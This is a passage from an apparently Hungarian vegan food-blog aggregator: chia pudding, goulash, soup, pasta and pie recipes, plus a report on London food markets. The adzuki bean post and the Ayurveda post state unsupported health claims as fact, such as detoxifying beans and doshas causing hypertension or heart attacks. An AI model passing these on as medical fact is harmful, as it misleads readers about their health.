elcsábítanom a chia puding függők táborába. Szívesen vállalom érte a felelősséget, mert nagyon finom, és nagyon egészséges! ;-) Ebben a posztban két újabb chia reggeli ötlettel szeretnék nektek kedveskedni. A szezonnak megfelelően egy szőlős - kendermagos, és egy egész évben készíthető csokis - kókuszos változatot mutatok meg. Érzitek már a chia puding hullámot? Van kedvetek tovább szörfözni rajta? Kóstoljátok meg, mindig más és más gyümölcsökkel, extrákkal, mert megéri. ;-) szőlős kendermagos chia puding (mindenmentes, nyers, vegán) HOZZÁVALÓK (1 személyre) az ALAP CHIA REGGELIZŐ PUDINGHOZ: - 2 dl növényi tej tetszés szerint (én mandulatejet vagy kókusztej italt használok legtöbbször) - 2 evőkanál chia mag (egész) - 1 db érett banán a szőlős - kendermagos chia pudinghoz: - az alap chia puding - 1 marék szőlő - 1 ek kendermag - 1 ek őrölt arany lenmag a csokis - kókuszoshoz: - az alap chia puding - 1 marék kókusz chips - 2 ek karob por (vagy bio kakaópor) - 1 ek őrölt lenmag - 1 marék málna vagy egyéb idény szerinti gyümölcs.(Amikor a képet készítettem, még málna szezon volt.) Játszatok az alap recepttel tovább! Az extra hozzávalók, és az ízésítés terén csak a kreativitásunk szabhat határokat. Pl.: fahéj, szerecsendió, gyömbér, kókusz, goji bogyó, citrom, lime, mogyoró, brazil dió, tökmag stb. De láttam már zöld turmixból készült chia pudingot is. :-) csokis kókuszos málnás chia puding (mindenmentes, nyers, vegán) ELKÉSZÍTÉS Egyszerűen tegyük a banánt (minél érettebb, minél pötyösebb, annál édesebb), a választott növényi tejet a turmixgépbe, és készítsünk belőle banános tejet. (Ha nincs gépünk, törjük össze villával a banánt.) Öntsük ki a müzlistálba, keverjünk bele két kanál chia magot, és tegyük félre min. egy fél órára. Akár már előző este elkészíthetjük a banános tejet chia maggal, és a hűtőben tárolva pihentethetjük. Minél tovább pihen, annál sűrűbb, annál pudingszerűbb lesz az étel. (Én így jobban szeretem.) Ha csokis alapot szeretnénk, még a pihenés előtt keverjük hozzá a karob port, vagy a bio minőségű kakaóport a banános tejhez. Ezután tegyük félre pihenni. Kérdeztétek már tőlem. hogy egész szemű vagy darált chia magot használjatok? Próbáltam már mindkettővel, de nekem az egész szemű jobban bevált, és jobban ízlett. Próbáljátok ki, és döntsétek el nektek melyik tetszik jobban?! chia mag a chia pudinghoz Mielőtt készen állunk rá, hogy elfogyasszuk a jól megérdemelt reggelinket, adjuk hozzá a tetszés szerint választott gyümölcsöt / gyümölcsöket, magokat, dióféléket, fűszereket, vagy akár extra banánt, édesítőszirupot, vagy épp ellenkezőleg reszelt citromhéjat. És már fogyaszthatjuk is a kevés munkát igénylő, ám annál táplálóbb, egészséges reggelinket. Kezdjük a napot finom, tápanyagban gazdag, energiadús ételekkel, és a mosoly mellékhatásként fog jelentkezni! ;-) szőlős kendermagos chia puding (mindenmentes, nyers, vegán) TÁPLÁLKOZZ, NE CSAK ÉTKEZZ! :-) Megjegyzés1: "A kendermag kedvező biológiai összetétele és jótékony egészségügyi hatása alkalmassá teszi, hogy minden háztartásban helyet kapjon. Fontos külön kiemelni a vegetáriánus konyhában betölthető szerepét, hiszen a hús mellőzésével az egyik fő nehézség a fehérjében gazdag étrend összeállítása. A kendermag kivételes fehérjeforrás, így a szójaérzékenyek számára is alternatívát nyújt. Ezenfelül a kendermag magas rosttartalommal rendelkezik, E-vitamint és nyomelemeket - magnéziumot, káliumot és vasat - tartalmaz, valamint megtalálható benne mind a 9 esszenciális aminosav. ... " Bővebben a CKmagazin-ban csokis kókuszos málnás chia puding (mindenmentes, nyers, vegán) Megjegyzés2: Mint minden szuper étel és mesterségesen előállított, nagydózisú vitamint tartalmazó készítmény, a chia mag fogyasztása sem ajánlott nagy mennyiségben, és semmiképpen sem minden nap. A kevesebb, néha több! jelmondat itt is igaz. A napi 1-2 evőkanál adagot ne lépjük túl, és ne együnk minden nap! Tartsunk néha szünetet.
Francia krémes
Beindult a sütőtök szezon, szerencsére tele van vele a kertem, és az mellett, hogy rendkívül egészséges, isteni finom! Nyersen az íze még intenzívebb, édesebb ;) Próbáljátok ki! Hozzávalók: Középső krémhez: 1/2 sonkatök 1 hüvelykujjnyi reszelt friss gyömbér 1 kk vanília 1 ek méz 1 ek kókuszolaj 1 banán 1 tk útifű maghéj 1/2-1 dl datolyalé […]
Londoni gasztroélményeim
Hosszabb hallgatásomnak nyomós oka van, amit ezennel megtörök. Ahogy azt a (fehér)cukortól (általam hozzáadott más cukortól is) mentes meggylekvár írásom elején jeleztem, változás előtt álltunk, ami szeptember hónapban be is következett. A változás nem más, mint egy időre Londonba költöztünk, férjemmel itt próbálunk meg talpon maradni, élni, főzni, enni. Az itt ért (leginkább gasztro) benyomásokból szeretnék most egy képes beszámolót adni minden kedves olvasómnak.
A képen a Hyde Park részlete látható. Londonban rengeteg park van. Bizonyára az egyik legzöldebb világváros.
Még nem tudom, mennyi ideig leszünk ebben a városban, távlati célunk ugyanis egy kisebb (Budapestnél is kisebb) város lenne, például Bristol, vagy Brighton, de egyelőre most London-t kell megélnünk.
Mindenekelőtt el kell mondjam, hogy a legokosabb döntésem volt, kihozni magunkkal a turmixgépet (itt ugyanazt a típust láttam egy kirakatban, kb. 8.000 forinttal drágábban), piros fűszerpaprikát, hajdinát, zabot, stb. Nem bántam, hogy ezek által kevesebb ruha fért be a táskánkba, viszont nagyon szuper, hogy a turmixgépet tudom használni, és nem itt kell felkutatnom egy minőségit elfogadható áron. Zabot és hajdinát pedig egyszerűen sehol nem látok. (Zabpehely persze van.)
Mielőtt kijöttünk volna ide, az utolsó pénteken még kilátogattam a Bosnyák piacra, vettem egy-két finom hazai gyümölcsöt, s közben azon gondolkodtam, vajon itt, Londonban hogyan fogok boldogulni a nyers ételek beszerzésével. Valószínű, a legtöbb zöldség-gyümölcs import áruként kerül az országba (sajnos). London városában járva kelve láttunk néhány zöldségest, de igazibb piacot, ami otthon is van (pl. Fővám téren vagy az előbb említett Bosnyák téren) mindeddig kettőt sikerült úgy igazán felfedeznem.
Az elsőt Whitechapel Station megállóból kijövet láttam meg, s hazafelé természetesen megálltam, s jól bevásároltam. A második pedig Dalston Junction megállónál van. Mindkét helyen már többször voltam, képeket is "hoztam". Az érdekessége e két piacos placcnak számomra az, hogy egyetlen overground járattal összekapcsolható a kettő. Igaz, egy kicsit gyalogolni kell, mert Dalston Junction-nál leszállva egy nagyobb saroknyi utat kell megtenni Dalston Kingsland-ig, amivel szemben helyezkednek el a kirakodók.
Whitechapel Station közelében lévő árusoknál nagyon sok különleges dolgot láttam, amikről nem tudom pontosan, mi is az. (Ha bárki a képeken látja és be tudja azonosítani, írjon nyugodtan!) Sok jamaikai-t láttam arra, bár az is igaz, hogy a közelben van ugyanakkor a londoni muszlimok központja is, a kelet londoni mecsettel.
Nagyon érdekelnek azok a növények, amelyeket lefotóztam, s Magyarországon nem igazán ismertek. Kíváncsi vagyok, milyen ételeket lehet belőlük készíteni, melyik nemzet konyhájának specialitásai. Szívesen megtanulnék egy-két vegán ételt más ízek hazájából. Időm egyelőre nem engedte, hogy az interneten felfedezzem a recepteket.
Dalston Juction piacánál csak egy dolgot emelnék ki, hogy bizonyára több eladó árulja a portékát, mint Whitechapel-nél mivel akár 4 sort is alkotnak egymás mögött az árusok.
Mindkét helyen nem csak élelmiszert, hanem ruházatot, konyhai felszereléseket, fűszereket is árulnak. Dalston Kingsland piacán változó, hogy milyen árus van gyakrabban. Amikor csütörtökön jártam arra, akkor meglehetősen sok zöldséget, gyümölcsöt árusító "kofa" volt, pénteken pedig főként ruhákat árultak, csak kevés zöldséges volt.
Szintén mindegyik helyen halas is van, elsősorban tengeri halakat láttam, bár annyira alaposan nem vettem szemügyre. Hentes árukat is be lehet szerezni, de ezek már boltokban vannak, amelyek fixen vannak nyitva, szinte minden nap.
Whitechapel-nél láttam néhány üzletet, ahol a keleti világ édességeit árulják - a képeken ezeket is bemutatom. Bevallom, a pisztáciás zöld akármi kicsit érdekel. A városban másfelé járva szintén láttam ilyen boltokat, de még nem szakítottam időt arra, hogy megkérdezzem a bolti dolgozót, hogyan készül és miből van. Tartok tőle, hogy tele van cukorral... :(
Magyar nyelvű útleírásokban, turista-információkban nem nagyon találkoztam ezzel a két hellyel, Borough Market-tel pedig annál inkább. Nos véleményem szerint a Borough Market valódi turistáknak való látványosság. Számomra inkább sznobizmus jut róla eszembe, no meg egyfajta gasztrofesztivál állandósított helye, de a hétköznapi bevásárláshoz minden bizonnyal nem a legjobb hely, főként egy vegán vagy vegetáriánus illetőnek. Azért is elsősorban turistáknak ajánlom, mert különlegesebb dolgokat lehet ott beszerezni, illetve a hely egy kisebb részén találhatunk friss zöldséget, gyümölcsöt, nagyobb területén inkább kész-ételt (sósat, édeset, pékárut, sajtféléket, borokat, olajokat, stb.) lehet vásárolni. Ezért gondolom róla azt, hogy egyfajta állandó gasztrofesztivál helyszíne. S hát igen, mi nem tartozunk azok közé, akiknek ez az árfekvés kedvező lenne. (Csak egy példa: répa, narancs és citromból helyben készített 100%-os 2.5 dl ital ára 2,5 font. Középárfolyamon egy font 420-430 forint, tehát a 2,5 dl ital ára cirka 1000 forint).
Végezetül jöjjenek a képek, amelyek szerintem többet is elárulnak, mint amennyit én próbáltam összeállítani. :)
Whitechapel market:
Cím:
Whitechapel Rd Tower Hamlets London E1 5BS
Nyitva tartás: Hétfőtől szombatig 8:00-18:00
Gyümölcsök és zöldségek Whitechapel Market-on:
Egy angol nyelvű vélemény Whitechapel Marketról (2010-ből, de ma is aktuális) az egyik, piacokról (is) szóló oldalról:
"I dont understand why the other reviewers were so down on this lovely bit of commerce on Whitechapel. Where else can you get a box of 10 mangoes for 3 pounds? Maybe in Mexico, amigo. But NOWHERE else in London. Similarly, 3 bunches of coriander (AKA cllantro) for 1 pound? Great prices on exotic foods. And I bet you can bargain, though Ive never tried because things are so cheap already. There are probably 50 stalls in this market, some selling lingerie, others selling fish, and others focusing on the bollywood dvd scene. Its all good. For cheap produce though, you cant beat it. If youre more into the Borough market thing, go down there and drink your latte while you push your three-wheel stroller. If youre more into good cheap food from nice folks (without the marketing) go to Whitechapel."
Lényegében azt fejezi ki az írója, hogy nem érti, miért húzzák le ezt a pompás kis kereskedelmi helyet mások. Hol máshol tudsz egy doboznyi (10 db) mangót 3 fontért venni? Sehol máshol. Szerinte még talán alkudni is lehet, amire neki nem volt szüksége, mert minden olyan olcsó. Nagyjából 50 árusító hely van, s felsorolja, mi mindent lehet ott vásárolni. Végül azzal fejezi be mondandóját, ha többet akarsz tudni a Borough market-ről, menj csak el oda, idd meg a tejeskávédat, ..., de ha inkább érdekelnek az olcsó ételek a kedves helybéliektől, akik ráadásul nem is reklámozzák portékáikat, akkor menj Whitechapel-re!
Az overground megállója kívülről és egyéb élelmiszerek:
Dalston Kingsland (Dalston Juction):
Cím:
Kingsland High Street London E8 2JS
Nyitvatartási időt nem tudok. (Lehet, hogy ez az overground alapban elmegy Kingsland megállóig, de eddig minden alkalommal Juction volt a végállomás, amikor Whitechapel felől közelítettem meg.)
Borough Market:
Cím:
8 Southwark Street London SE1 1TL London Bridge
Nyitva tartás: Hétfőtől szombatig 10:00-17:00
Pékáruk a Borough Market-en:
Zöldségek, gyümölcsök, csonthéjasok ugyanitt:
Egyéb (kész)ételek:
Egy serpenyős villámgyors padlizsános spenótos paradicsomos tészta (vegán)
2015. október 15. Zizi kalandjai
Egy lábasos/serpenyős tészta… minden anya, elfoglalt ember álma! A lényege, hogy minden egy helyen, egy lábasban fő meg, a tésztától a zöldségekig. Mivel rövid idő alatt elkészül, ezért az interneten keringő változatok többsége vegetáriánus, de a vegán receptek is előfordulnak. Én természetesen vegán verziót csináltam.
Nagyon érdekes a tészta története. Martha Stewart tette híressé (az alapváltozat: paradicsom, vöröshagyma, bazsalikom, spagetti, só, víz), azonban egyik kolléganője, Nora Singley (étel stylist) fedezte fel egy olaszországi utazása alkalmával. Peschiciben – egy pugliai halászfaluban – járt és betért egy kis vendéglőbe, ahol Matteo, a pincér – aki egyben a szakács is volt és a tulajdonos fia -, elmesélte neki, hogy az édesanyja hogyan főzi meg pillanatok alatt a paradicsomos tésztát és el is készítette Noranak és kolléganőjének a vacsorát. Nora aztán az ötletet és a receptet “elvitte magával” New Yorkba, megfőzte Marthanak, majd egy idő után kikerült az internetre és vírusszerűen elterjedt (itt találjátok a teljes sztorit és az eredeti fotókat). Sokféle változata van, íme egy gyűjtemény 21 féle fajtáról. A Street Kitchen csapata pedig egy cukkinis, olívabogyós változatot készített.
Én hűtőben lévő maradék zöldségeket használtam: padlizsánt, spenótot; és adtam hozzá lilahagymát, fokhagymát, paradicsomszószt, olívaolajat, sót, borsot, fűszereket, tésztát, vizet és egy különlegességet: vegán parmezánt! Tejmentes, laktózmentes, szójamentes, pálmaolaj mentes, gluténmentes. Növényi sajthelyettesítő vegánoknak és tejérzékenyeknek is, parmezán ízben. Valószínűleg ennek köszönhető, hogy az egész finom, krémes lett. Belepakoltam mindent a nagy serpenyőbe, felöntöttem vízzel, feltettem főni és elkezdtünk Ádival játszani. Mire felugrottam, hogy rá kellene néznem a tésztára, már szinte készen is volt. Előkészületekkel együtt tényleg megvan 15-20 perc alatt. Annyira finom lett, hogy gyakori vendég lesz a konyhánkban!
Próbáljátok ki!
Egy serpenyős villámgyors padlizsános spenótos paradicsomos tészta (vegán)
Hozzávalók 2-3 főre:
– 1 db kisebb padlizsán, 1*1 cm-es kockákra vágva (nem kell meghámozni)
– 1 fej lilahagyma, felszeletelve
– 2-3 gerezd fokhagyma, felaprítva
– 1 nagy marék spenót, vékony csíkokra vágva
– kb. 250 g paradicsomszósz (ez kb. 250-300 ml)
– 100 g vegán parmezán, reszelve
– 1-1 teáskanál szárított bazsalikom és oregánó (akinek van friss, használja azt)
– 1-2 evőkanál extra szűz olívaolaj
– só, bors
– kb. 600 ml víz
Tegyük a serpenyőbe az összes hozzávalót, öntsük fel a vízzel és jól keverjük össze. Tegyük fel a gáztűzhelyre és közepes láng felett, időnként megkeverve, főzzük meg kb. 12 perc alatt.
Ha nagyon besűrűsödött, akkor adjunk hozzá még egy kevés paradicsomszószt vagy vizet, igazítsuk az ízeket, keverjük át és már tálalhatjuk is!
Na, éhesek lettetek?
Tápláló babgulyás adzuki babból (gluténmentes, laktózmentes, tojásmentes, vegán)
2015. október 13. Zöld Avocado
tápláló babgulyás adzuki babból (gluténmentes, laktózmentes, tojásmentes, vegán) A tél közeledtével egyre sűrűbben előkerülnek a leveses fazekak, a mélytányérok. A magyarok nagy levesfogyasztó nemzet hírében állnak, ami a hideg idővel még igazabbá válik. El sem tudjuk képzelni a vasárnapi ebédet, vagy egy ünnepi menüsort, leves nélkül! :-) Pedig sok milliárd ember számára nem olyan természetes a levesek rendszeres fogyasztása, mint számunkra. Ha pedig beköszönt az ősz, még szívesebben kanalazgatunk egy-egy forró zöldséglevest, krémlevest, vagy akár egy tartalmas babgyulást. A nyáron sokkal több friss és lédús gyümölcshöz és zöldséghez jutunk, mint télen, így a téli folyadékpótlás nagy részét ilyenkor a levesek biztosítják. Mi magunk is nagyon szeretjük őket. Gyakran készítek hamis gulyásokat, például csicseriborsóval (hús helyett), lencsével, vagy az egyik nagy kedvencünket, a babgulyást. Amióta megismerkedtem az adzuki babbal, előszeretettel készül a konyhámban adzuki babos gulyásleves mindenki nagy örömére. tápláló babgulyás adzuki babból (gluténmentes, laktózmentes, tojásmentes, vegán) Az adzuki bab Kelet - Ázsia közkedvelt alapanyaga, ahol nem csak leveseket és salátákat készítenek belőle, de teákat, és édeskés ízének köszönhetően finom desszerteket is. " A növény magjait már időszámításunk előtt 1000 évvel fogyasztották Kínában és Koreában. Japánba, ahol jelenleg is nagyon kedvelt élelmiszer, csak később került. A kelet-ázsiai konyhában az adzukibabot édesen szokás fogyasztani. Általában cukorral főzik össze és így jön létre az a bizonyos bab paszta, ami az egyik legfontosabb összetevője a kelet-ázsiai ételeknek, édességeknek. Gyakran ízesítik is, ugyanúgy, mint a gesztenyemasszát. A vörös bab masszát számos kínai ételhez is felhasználják, mint például a vörös bab fagylathoz. Rengeteg japán édességben is megtalálható. 2009. október 20.-án pedig a Pepsi kiadott egy adzukibab ízesítésű iható terméket is." Forrás: Wikipedia 10 OK, HOGY MIÉRT FOGYASSZUNK ADZUKI BABOT? 1) A fejtett babok a vegetáriánus táplálkozás fontos pillérei, mivel nagyszerű fehérjeforrások, tökéletes húspótlók a szervezet számára. Az adzuki bab a makrobiotikus táplálkozók körében is az egyik legkedveltebb hüvelyes, nagyon magas fehérjetartalmának köszönhetően. 2) Jelentős B1- és B2 vitamintartalma mellett, hasznos vas-, kalcium-, magnézium és foszfor forrás. 3) Magas kalóriatartalma ellenére alacsony zsírtartalommal rendelkezik. 4) Rendkívül magas rosttartalmának köszönhetően csökkenti a koleszterinszintet. 5) Alacsony glikémiás indexének köszönhetően természetes inzulinszabályozó. Egyensúlyban tartja a vércukorszintet, így cukorbetegek számára is kifejezetten ajánlott a fogyasztásuk. 6) Oldhatatlan rosttartalma jótékony hatással van a belek mozgására, a székrekedésre. Ennek köszönhetően csökkenti a végbél- és vastagbélrák kialakulásának kockázatát. 7) A felgyorsult bélmozgásnak köszönhetően remekül méregtelenít, salaktalanít. 8) A hagyományos kínai gyógyászat szerint a kínai vörös bab, a szív gabonája, mert egyszerre tisztítja meg a szívtüzet és tölti fel vérrel a szívet. Tökéletes vérnyomás-szabályozó. 9) Magas rosttartalma miatt hosszú ideig telítettség érzést okoz, és ez párosítva az alacsony zsírtartalommal, és az alacsonyan tartott vércukorszinttel, segít a testsúlyunk kordában tartásában, a fogyásban. 10) Magjának csíráztatásával értékes esszenciális aminosavakhoz juthatunk. +1) Fontos élelmiszer alapanyag funkciója mellett, hasznos kozmetikum is. Bőrápolóként friss, puha, energiával teli arcbőrt kapunk, egy-egy adzuki babbal készített pakolás vagy lemosó után. tápláló babgulyás adzuki babból (gluténmentes, laktózmentes, tojásmentes, vegán) Magyarországon leginkább vörös színű adzuki babot lehet vásárolni bioboltokban, de létezik fehér, fekete és szürke színben is. A többi babhoz hasonlóan ezt is áztassuk be előző éjszaka, hogy könnyebben meg tudjuk főzni. Vigyázzunk, mert az adzukibab hamarabb megfő, mint a hagyományos bab, nekem is sikerült túlfőznöm. ;-) Főzve, fagyasztóban tárolva, akár hónapokig is eláll, így bármikor amikor szeretnénk, csak előkapjuk és változatos formában, különböző ételekben felhasználhatjuk. Itt a Zöld Avocado vegetáriánus gasztroblogon egy hagyományos babgulyást készítettem nektek, de használhatjuk saláták alapanyagaként, pörköltökbe, kenyérre kenhető krémként, sütőtököt tölthetünk meg vele, fogyaszthatjuk rizses egytálételbe, mexikói ételek töltelékeiként, tortillával, chipsz-szel, de akár édességek alapanyagaként is. A későbbiekben biztosan ki fogom próbálni, mint desszert alapanyag! ;-) tápláló babgulyás adzuki babból (gluténmentes, laktózmentes, tojásmentes, vegán) HOZZÁVALÓK - 4 db közepes sárgarépa - 1 db nagyobb fehérrépa - 500 g bio adzuki bab (előző éjszakára beáztatva) - 2 db közepes vörös hagyma - 2-3 ek olívaolaj (vagy répceolaj) - 1 közepes érett paradicsom - Himalája só, őrölt fekete bors, 3 db bio ételízesítő leveskocka, 1 ek mustár - 1 nagy marék friss petrezselyem - nagy fazék tiszta víz - - gluténmentes csipetke: (barna) rizsliszt, Himalája só, víz (elhagyható) tápláló babgulyás adzuki babból (gluténmentes, laktózmentes, tojásmentes, vegán) ELKÉSZÍTÉS Mint minden leves, ez is nagyon egyszerűen elkészíthető! Az apróra vágott vöröshagymát olajon megdinszteljük, majd rászórjuk az apróra vágott paradicsomot. 1-2 perc kevergetés után, hozzáadjuk az előre beáztatott adzuki babot, a megtisztított és felkarikázott sárgarépát, a fehérrépát felvágva kb. 8 darabba. Az egészet felengedjük kb. háromszoros mennyiségű vízzel, és hozzáadjuk a fűszereket, illetve az apróra vágott petrezselymet. Fedő alatt, közepes lángon, kb. 1 óra alatt készre főzzük a babgulyást. Közben néha megkeverjük. (Nem szükséges liszttel sűríteni) Amikor már puha a bab és a répa is, beleszaggatjuk a gluténmentes csipetkét. Sajnos nem tudok pontos mennyiségeket írni, mert érzésre készítem. Egy müzlistálat félig töltök rizsliszttel, hozzáadok kb. 1 tk Himalája sót, és annyi vizet, hogy csipkedhető keményebb tésztát kapjak. Olyan gyurmaszerű állagot. A forrásban lévő levesbe csipkedjük lisztes kézzel a csipetkéket. A méretét szabadon megválaszthatjuk. Általában a nokedlinél egy kicsit nagyobb galuskákat tépkedek, amik a főzés során még egy kicsit meg is fognak dagadni. Miután az összes csipetke a levesben van, visszatesszük a fedőt, és még kb. 5 percig főzzük az egészet egybe. Ezután tálalható is a gazdag és tápláló, meleg adzukibabból készült gulyásleves. tápláló babgulyás adzuki babból (gluténmentes, laktózmentes, tojásmentes, vegán) Táplálkozz és ne csak étkezz! Jó étvágyat kívánunk! :-) Amíg elkészül a gulyásleves, készítsetek mellé például mindenmentes, narancsos sütőtökös diós kuglófot, mindenmentes, narancsos sütőtökös diós kuglófvagy laktózmentes, amerikai banán-palacsintát, laktózmentes, amerikai banán-palacsinta vagy tojásmentes , túrós kakaós zabpalacsintát. (Ez utóbbi kettő már nem vegán, és nem is gluténmentes ételek.) tojásmentes, túrós kakaós zabpalacsinta Megjegyzés1: Nem tudom, hogy ti már észrevettétek-e, de a gulyáslevesek, és a pörköltek sokkal, de sokkal finomabbak, és zamatosabbak másnap, illetve harmadnap. Minél "érettebb", annál ízesebb! Legalább is nekem ez a tapasztalatom. ;-) Így ha vendégeket szeretnétek elkápráztatni egy hamis gulyáslevessel, pörkölttel (pl.: csicseriborsó pörkölt), akkor készítsétek el még előző nap, és hagyjátok összeérni az ízeket. Megjegyzés2: A hüvelyesek, gabonákkal történő fogyasztása tökéletes fehérjeforrás, és egymást kiegészítve teljesértékű tápláléknak számít. tápláló babgulyás adzukibabból (gluténmentes, laktózmentes, tojásmentes, vegán)
Fűszeres sütőtök krémleves hideg napokra
Imádom a sütőtököt. Ez volt az egyik ok, amiért kicsit vártam már az őszi napokat. Mikor kint már kezd hűvösre fordulni, jól esik egy tányér finom meleg leves, ami átjár minket egy hosszú nap után. Na ez a leves szerintem pont ilyen. Kellemesen fűszeres, laktató, pirított magokkal és egy pirítóssal főételnek is megfelel. Mikor felvágtam a sütőtököt olyan meglepetés várt belül, amire nem is számítottam. :) A magok csírázásnak indultak, ami annyira jó látvány volt. Csupa élet volt ez a sütőtök, egyenesen anyukám kertjéből. Friss és tápláló, tele vitaminokkal és minden jóval. A sütőtök egyébként tele van C-vitaminnal, gazdag forrása A-vitaminnak, B-vitaminoknak és E-vitaminnak, folsavnak és vasnak is. Hozzávalók: sütőtök oliva olaj kókusz tejszín fűszerek: himalája só, bors, fokhagyma, gyömbér 1. A sütőtököt megtisztítjuk, majd cikkekre vágva megsütjük. 2. A megsült sütőtök darabokról lehúzzuk a héját és egy fazékban felöntjük vízzel, feltesszük főni. 3. Botmixerrel turmixoljuk simára, majd fűszerezzük bátran! Só, frissen őrölt bors, 3 gerezd fokhagyma, friss reszelt gyömbér. Ezután tegyünk hozzá egy fél doboz kókusztejszínt, ami megkoronázza és kiemeli az ízeket. Kiemeli a sütőtök édességét és az erősebb fűszerezést kissé tompítja. Ezzel lesz igazán lágy és selymes, mégis fűszeres, melegítő hatású. Én nem használtam fel az egész tököt, mert elég nagy volt, így is többször ehettünk belőle. Tehát ha kisebb sütőtökből készítjük, nem kell annyi kókusz tejszín sem. Ani
Az elemek és a dósák az ájurvédában
2015. október 9. Élj harmóniában
Egy korábbi bejegyzésben már írtam arról, hogy mi is az ájurvéda.(itt olvashatod). Ebben a bejegyzésben az ájurvéda alapjáról a dósákról olvashatsz . A dósák megértéséhez először egy kicsit az elemek megértése szükséges. Az világot öt alap elem alkotja. Az emberi test ugyancsak ezen elemekből épül fel. Éter: üregek - hallás, beszéd, fül Levegő: mozgás - tapintás, bőr Tűz: hő - látás, szem, nemi szervek Víz: nedvek Ízlelés, nyelv, száj Föld: szilárd forma, szaglás, orr, kezek A térelem különös szerepet játszik az ájurvéda rendszerében, mert lehetővé teszi a hang jelenlétét, amelynek térre van szüksége a terjedéshez. Az ájurvéda szerint a hang (a rezgések) az alapja minden létező dolognak. A test rezgéseit mozgósítva az ájurvéda az ilyen hangokat gyógyításra használja. A dósák az ájurvéda alapján, az elme és a test közötti kapcsolatot, műkődési elvet jelentik. A három dósa a Vata, Pitta, Kapha, ezek a test-lélek-elme működését szabályozzák és az öt elemet testesítik meg. Váta (éter és levegő): száraz, hűvös, könnyű Pitta (tűz és víz): forró, heves, savanyú, olajos Kapha (víz és föld): nehéz, szilárd, olajos, tompa, édes Az egyes dósák testi és szellemi funkcióit és elhelyezkedésüket a testben az alábbi táblázatban láthatod. Dósák és az elemek az ájurvédában A gyakorlati életben pl. látható, hogy Vata egyensúlyzavar és a hideg, szeles idő között komoly kapcsolat van. A vata levegős dósa, így a sok levegő hatására elkezd túltengeni. Ennek jellemző panasza pl. a gázképződés a belekben. Pitta meleget érez, hajlamos az izzadásra energikus mozgékony. A tűz energiái mutatkoznak meg az érzelmekben is, nagyon mozgékony. Kapha jellemzően hajlamos infarktusra, eldugult melléküregekre különböző nyálkahártya problémákra a túl sok víz miatt. A dósák irányítják a test szöveteinek létrejöttét, fen maradását, pusztulását, salakanyagok távozását. Felelősek az érzelmekért - félelem, düh, együttérzés, birtoklás. A fogamzás pillanatában meghatározódik az egyén alapvető alkata - elsődlegesen szülőkben előforduló elemek alapján. Az egyéni típus attól függ a dósák milyen arányban vannak jelen az emberben. Az öngyógyítás, egyensúly megtartás alapfeltétele a dósák működése, működésük megértése. Az ájurvéda szerint a dósák egyensúlya az egészség alapfeltétele. Amennyiben egy vagy több dósa kibillen az egyensúlyából, úgy testi-lelki szinten különböző tünetek jelentkeznek melyek később betegség formájában nyilvánulnak meg. Az egyensúlyi állapot megőrzésének vagy visszaállításának elősegítésére, az ájurvéda bizonyos tartós, minőségeket ír le, amelyek az egész természetben megnyilvánulnak. Néhány jellemező a dósák vonatkozásában VATA jellemzői Hideg - hideg végtagok, nem szereti a hideg éghajlatot. Mozgékony - attól függően, hogy ez a dosha milyen egyensúlyban van, jó és rossz vérkeringést hoz létre, a magas vérnyomás a túlfokozott Vatával kapcsolatos, akárcsak a szív ritmuszavarai, az izomgörcsök és a háti fájdalmak. Az ideges, nyugtalan tekintet Vata-egyensúlyzavar jele. Gyors - sok ezzel kapcsolódó vonáshoz vezet: új információk gyors megragadása, ugyanakkor gyors elfelejtése. Száraz - száraz bőr, száraz vagy fénytelen haj, fénytelen szem és minimális vagy mérsékelt izzadás. A bőr repedezett és törékeny lehet, hajlamos pikkelysömörre és ekcémára. Durva - durva bőr, sprőd haj Változékony - hangulat ingadozások, változékony étvágy Könnyű: könnyedség, alacsony testsúly PITTA jellemzői Forró - meleg, pirospozsgás bőr, mindenfajta gyulladás, túlműködő anyagcsere, melegségérzet a gyomorban, a májban, a belekben stb. A Pitták általában szeretik a hideg ételeket és italokat, amelyek ellensúlyozzák saját hőjüket. Éles - éleselméjűség, de ugyanakkor csípős nyelv, ugyanaz a minőség a test szélsőséges elsavanyodásához és gyomorsavtúltengéshez vezethet. Nedves - bőséges izzadásban nyilvánul meg: a meleg izzadt tenyér tipikusan Pitta. A Pitták forróak és nedvesek lévén, rosszul tűrik a nyirkos nyári id?járást. Savanykás szagú - szélsőséges Pitta-jelenlét esetén rossz lehelet, savanyú testszag vagy rossz szagú vizelet és széklet. KAPHA jellemzői Súlyos - minden súlyos rendellenesség Kapja-egyensúlyzavart sejtet, legyen az akár elhízás, nehéz emésztés vagy súlyos, nyomasztó depresszió. Édes - amely súlyfelesleghez és cukorbetegséghez vezet, ha túlságosan sok édesség jut a testbe. Állandó - ez a Kapha-típust tartózkodóvá teszi. A testi folyamatok nem mutatnak negy kilengéseket, a kapha állandó természete azzal függ össze, hogy nincs szüksége kívükrő l jövő ösztönzésre, mint a vatának vagy a Pittának. A Kaphák teste érzéketlen az olyan változásokra, amelyek a más testtípusúakat kibillentik egyensúlyukból. Lágy - ez a jellegzetességek széles skálájához vezet: lágy b?r és haj, lágy modor, lágy tekintet és a helyzetek igénytelen megközelítése. Lassú - ez a Kapha-emberek jellegzetes lassú, folyamatos mozgásában nyilvánul meg, amely lassú beszéddel és megfontolt gondolkodással társul. Ha szeretnél többet tudni az ájurvédáról: 2015. október 11. vasárnap ájurvéda életmódtanfolyam bővebb információ: http://www.eljharmoniaban.hu/#!ajurveda-eletmodtanfolyam/c1fch
Almás-vaníliás lepény (vegán)
2015. október 5. Mindennapi ételeink
Fanni nem édesszájú. Az édesség iránti vágyát kielégíti a reggeli kása, a datolyaszirup, aszalt datolya, aszalt áfonya, aszalt eper (ez nagy kedvenc), mazsola vagy amit mindennap szívesen megeszik: sós mogyorókrém :-)) vagy karobos-mézes tahini. De ezt a lepényt ő is megeszi. Igaz, nem sokat, de jólesik neki. Hozzávalók: 50 dkg finomliszt 2,5 dkg élesztő 2 ek. aranybarna nádcukor 5 dkg növényi margarin 25 dkg rizstej 15 dkg vaníliás puding - elkészítve (1 csomag pudingpor, 0,5 dl rizstej, 10 dkg nyírfacukor) 5 nagyobb alma Elkészítés: A lisztet kimérjük, hozzáadjuk a barna cukorral megszórt kevés vízben felfuttatott élesztőt, majd a margarint, és a rizstej segítségével lágy tésztát gyúrunk. Langyos helyen 30 percig kelesztjük. Eközben a hagyományos módon elkészítjük a pudingot, az almákat pedig meghámozzuk és felcikkezzük. Egy tepsit kiolajozunk, lisztezünk, belesimítjuk a tésztát, megkenjük a pudinggal, ráhelyezzük az almákat és kevés cukorral, esetleg fahéjjal megszórjuk. 30 perc alatt 180 fokos 